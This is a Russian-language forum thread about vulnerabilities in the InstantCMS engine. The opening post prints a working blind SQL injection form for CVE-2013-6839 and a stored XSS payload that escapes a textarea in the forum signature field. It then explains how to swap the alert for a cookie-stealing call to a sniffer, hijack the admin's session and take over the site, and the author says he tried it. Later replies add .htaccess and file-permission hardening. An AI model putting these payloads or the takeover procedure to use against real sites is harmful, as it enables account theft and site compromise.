Instantcms Безопасность в InstantCMS

Тема в разделе "InstantCMS", создана пользователем admin, 23 апр 2014.

Модераторы: warna
  1. admin

    admin Глава Команда форума

    Сообщения:
    850
    Симпатии:
    77
    Пол:
    Мужской
    Данный движек очень опасный, так как имеет различные дыры

    Код:
    1) SQL-инъекция в InstantCMS: CVE-2013-6839
    Уязвимость существует из-за недостаточной фильтрации "OrderBy" HTTP POST параметра, переданного "/ каталог / [ID]" URL. Удаленный неавторизованный злоумышленник может выполнить произвольные команды SQL в базе данных приложения.
    Простой код эксплойта ниже использует технику эксплуатации слепых SQL-инъекций, и будет отображать различный порядок записей на странице, если версия MySQL 5 *.:
    < form action = "http://[host]/catalog/2" method = "post" name = "main" >
    < input type = "hidden" name = "orderby" value = "(-pubdate*(substring(version(),1,1)=5))" >
    < input type = "hidden" name = "orderto" value = "asc" >
    < input type = "submit" id = "btn" >
    </ form >
    Код:
    2) В редактировании профиля "подпись на форуме", подпись возвращает введенные данные. Если мы посмотрим структуру страницы, то заметим что возвращаемые данные будут в тегах <textarea>, остается закрыть этот тег и прописать свой скрипт.
    
    Для примера, вот код - </textarea><script>alert(document.cookie);</script>
    
    
    Оператор alert() выведет куки, которые использует пользователь открывший страницу. В такой уязвимости вместо alert() используют код который отправляет эти куки на другой сайт на котором есть сниффер, снифер должен сохранять пришедшие данные и оповещать хакера что они пришли(например по sms) .
    
    
    Администратор сайта может находится где угодно и править профили пользователя как ему заблагорассудится.

    Снифер отловит куки, останется только подсунуть их своему браузеру, кстати снифер может отловить не только куки, но и айпи адрес админа, заходим под куками админа, баним его адрес и вуаля, сайт наш, можем действовать дальше в зависимости от фантазии. Я проверил так и есть....
     
  2. severxak

    severxak Пользователь

    Сообщения:
    4
    Симпатии:
    0
    т
    так расскажите, как эт овсё исправить? очень бы хотелось
     
  3. admin

    admin Глава Команда форума

    Сообщения:
    850
    Симпатии:
    77
    Пол:
    Мужской
    Не пользоваться данным движком! Вот как!
     
  4. tvtop

    tvtop Пользователь

    Сообщения:
    16
    Симпатии:
    3
    Пол:
    Мужской
    Привет.Позвольте спросить - а альтернатива этому движку есть?
     
  5. admin

    admin Глава Команда форума

    Сообщения:
    850
    Симпатии:
    77
    Пол:
    Мужской
    А что для Вас альтернатива???
    WP или Джумла намного лучше, открытое сообщество, море плагинов и дизайнов
     
  6. tvtop

    tvtop Пользователь

    Сообщения:
    16
    Симпатии:
    3
    Пол:
    Мужской
    Нашел в просторах

    В папке components во всех ваших шаблонах которые есть, найти файлы com_users_view.tpl и com_users_profile.tpl и установить права 444 или просто только чтение.
    Файл .htaccess(его содержание внизу) и закинуть его во все папки с названием images, img, image, это дает возможность защиты от использования скриптов для взлома прописаных в картинках, аватарах и т.д.

    .htaccess
    Options -Indexes
    <Files ~ "\.tpl$">
    Order allow,deny
    Deny from all
    </Files>
     
    06shurik и tatuxis нравится это.
Модераторы: warna
Похожие темы
  1. admin
    Ответов:
    1
    Просмотров:
    824
  2. DLE
    Ответов:
    0
    Просмотров:
    585
  3. DLE
    Ответов:
    0
    Просмотров:
    554
  4. lorik
    Ответов:
    1
    Просмотров:
    480
  5. admin
    Ответов:
    4
    Просмотров:
    763
Загрузка...